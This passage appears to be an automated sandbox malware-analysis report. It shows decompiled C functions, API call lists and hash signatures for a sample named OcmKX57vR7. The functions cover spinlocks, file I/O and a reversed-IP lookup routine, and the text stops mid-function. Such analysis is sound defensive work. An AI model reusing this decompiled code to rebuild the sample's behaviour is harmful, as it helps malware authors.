                                                                                                                                  • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3384756699-0
                                                                                                                                  • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                                                                  • Instruction ID: 1ad0c6cfd5f0d92701aa1a496a80601a27e3e178faaffefb94088702eeea7b75
                                                                                                                                  • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                                                                  • Instruction Fuzzy Hash: 0971F67194021DEFDB11DFA4CC80AEEBBB9FB08354F10456BE516EA290D7709E92DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401C5F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}















                                                                                                                                  0x00401c60
                                                                                                                                  0x00401c64
                                                                                                                                  0x00401c6a
                                                                                                                                  0x00401c71
                                                                                                                                  0x00401c74
                                                                                                                                  0x00401c86
                                                                                                                                  0x00401c8c
                                                                                                                                  0x00401d1c
                                                                                                                                  0x00401d1c
                                                                                                                                  0x00401d1e
                                                                                                                                  0x00401d1e
                                                                                                                                  0x00401d21
                                                                                                                                  0x00401d21
                                                                                                                                  0x00401d23
                                                                                                                                  0x00401d24
                                                                                                                                  0x00401d2a
                                                                                                                                  0x00401d2e
                                                                                                                                  0x00401d30
                                                                                                                                  0x00401d30
                                                                                                                                  0x00401d33
                                                                                                                                  0x00401d33
                                                                                                                                  0x00401d35
                                                                                                                                  0x00401d36
                                                                                                                                  0x00401d42
                                                                                                                                  0x00401d6b
                                                                                                                                  0x00401d7e
                                                                                                                                  0x00401d88
                                                                                                                                  0x00401d88
                                                                                                                                  0x00401d8b
                                                                                                                                  0x00401d95
                                                                                                                                  0x00401d95
                                                                                                                                  0x00401c96
                                                                                                                                  0x00401c9d
                                                                                                                                  0x00401ca4
                                                                                                                                  0x00401cab
                                                                                                                                  0x00401cae
                                                                                                                                  0x00401cb3
                                                                                                                                  0x00401cbd
                                                                                                                                  0x00401cd2
                                                                                                                                  0x00401cd2
                                                                                                                                  0x00401ce1
                                                                                                                                  0x00401cea
                                                                                                                                  0x00401cef
                                                                                                                                  0x00401cf4
                                                                                                                                  0x00401cfe
                                                                                                                                  0x00401cfe
                                                                                                                                  0x00401d04
                                                                                                                                  0x00401d0a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401d14
                                                                                                                                  0x00401d1a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401d1a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf
                                                                                                                                  • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                                                                  • API String ID: 2111968516-120809033
                                                                                                                                  • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                                                                  • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                                                                  • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                                                                  • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00403F18 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                                                                  0x00403f1e
                                                                                                                                  0x00403f22
                                                                                                                                  0x00403f27
                                                                                                                                  0x00403f2b
                                                                                                                                  0x00403f2e
                                                                                                                                  0x00403f3e
                                                                                                                                  0x00403f4c
                                                                                                                                  0x00403f7c
                                                                                                                                  0x00403f7f
                                                                                                                                  0x00403f86
                                                                                                                                  0x00000000
                                                                                                                                  0x00403f86
                                                                                                                                  0x00000000
                                                                                                                                  0x00403f83
                                                                                                                                  0x00403f59
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403f5f
                                                                                                                                  0x00403f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                                                                  • GetLastError.KERNEL32 ref: 00403F4E
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3373104450-0
                                                                                                                                  • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                                                                  • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00403F8C Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                                                                  0x00403f92
                                                                                                                                  0x00403f96
                                                                                                                                  0x00403f9b
                                                                                                                                  0x00403f9f
                                                                                                                                  0x00403fa2
                                                                                                                                  0x00403fb2
                                                                                                                                  0x00403fc0
                                                                                                                                  0x00403ff0
                                                                                                                                  0x00403ff3
                                                                                                                                  0x00403ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x00403ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x00403ff7
                                                                                                                                  0x00403fcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403fd3
                                                                                                                                  0x00403fee
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                                                                  • GetLastError.KERNEL32 ref: 00403FC2
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 888215731-0
                                                                                                                                  • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                                                                  • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD41F3 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00AD421F
                                                                                                                                  • GetLastError.KERNEL32 ref: 00AD4229
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,?), ref: 00AD423A
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD424D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 888215731-0
                                                                                                                                  • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction ID: 5436d33755d669352b18bcd27d891b3ff85a14e444d6f3826d10e5c95f348c36
                                                                                                                                  • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction Fuzzy Hash: 7901E572511109ABEF01DF90ED85BEE7BACEB18355F108062F912E2150D7709A548BB6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD417F Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00AD41AB
                                                                                                                                  • GetLastError.KERNEL32 ref: 00AD41B5
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,?), ref: 00AD41C6
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD41D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3373104450-0
                                                                                                                                  • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction ID: 584461c6b07629d216da997c41c3c716ff05fcc51c2567268f438cd55bbee337
                                                                                                                                  • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction Fuzzy Hash: 7901E97A51110AABDF01DF90ED84BEE7B6CEB18355F104162F902E2150D7709A948BB5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADE036 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 35stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrcmp.KERNEL32(?,80000009), ref: 00ADE066
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmp
                                                                                                                                  • String ID: A$ A$ A
                                                                                                                                  • API String ID: 1534048567-1846390581
                                                                                                                                  • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                                                                  • Instruction ID: 1e3aff8b4408d35d1c058493d6c52adc6d954ca18720352100d5e9112be37c1e
                                                                                                                                  • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                                                                  • Instruction Fuzzy Hash: 89F09631200702DBCB30EF25D884A82B7F9FF05321B44862BE15AC7660D3B4E8D8CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040A4C7 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}






                                                                                                                                  0x0040a4dd
                                                                                                                                  0x0040a4df
                                                                                                                                  0x0040a4f7
                                                                                                                                  0x0040a4fa
                                                                                                                                  0x0040a4fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4e6
                                                                                                                                  0x0040a4ed
                                                                                                                                  0x0040a4f1
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4f1
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4ed
                                                                                                                                  0x0040a504

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                                                                  • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                                                                  • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                                                                  • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                                                                  • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404E92 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                                                                  0x00404e9c
                                                                                                                                  0x00404ea6
                                                                                                                                  0x00404ea8
                                                                                                                                  0x00404ec0
                                                                                                                                  0x00404ec3
                                                                                                                                  0x00404ec7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404eaf
                                                                                                                                  0x00404eb6
                                                                                                                                  0x00404eba
                                                                                                                                  0x00000000
                                                                                                                                  0x00404eba
                                                                                                                                  0x00000000
                                                                                                                                  0x00404eb6
                                                                                                                                  0x00404ecd

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                                                                  • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404BD1 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                                                                  0x00404bdb
                                                                                                                                  0x00404be5
                                                                                                                                  0x00404be7
                                                                                                                                  0x00404bff
                                                                                                                                  0x00404c02
                                                                                                                                  0x00404c06
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404bee
                                                                                                                                  0x00404bf5
                                                                                                                                  0x00404bf9
                                                                                                                                  0x00000000
                                                                                                                                  0x00404bf9
                                                                                                                                  0x00000000
                                                                                                                                  0x00404bf5
                                                                                                                                  0x00404c0c

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                                                                  • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                                                                  • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                                                                  • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                                                                  • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004030FA Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                                                                  0x0040310b
                                                                                                                                  0x00403122
                                                                                                                                  0x00403128
                                                                                                                                  0x0040312c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403111
                                                                                                                                  0x00403118
                                                                                                                                  0x0040311c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040311c
                                                                                                                                  0x00000000
                                                                                                                                  0x00403118
                                                                                                                                  0x00403131

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403103
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040310F
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                                                                  • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                                                                  • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                                                                  • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E177 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E0040E177(signed int _a4, long _a8) {
				void* _v8;
				void* _v12;
				void* __ecx;
				void* _t31;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t41;
				void* _t43;
				void* _t46;
				void* _t47;
				void* _t57;
				void* _t58;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t77;

				_push(_t58);
				_push(_t58);
				if(_a8 != 0) {
					L2:
					if( *0x4136c0 == 0) {
						L20:
						_t31 = 1;
						L21:
						return _t31;
					}
					if((_a4 & 0x00000001) != 0) {
						_t46 = E0040DFE2(_t58, 1,  &_v8,  &_a8);
						_t67 = _t67 + 0xc;
						if(_t46 != 0) {
							_t81 = _a8;
							if(_a8 != 0) {
								_t47 = E0040DBCF(_t81, 0x40000000, 2);
								_pop(_t58);
								_v12 = _t47;
								if(_t47 != 0xffffffff) {
									_t57 = _v8;
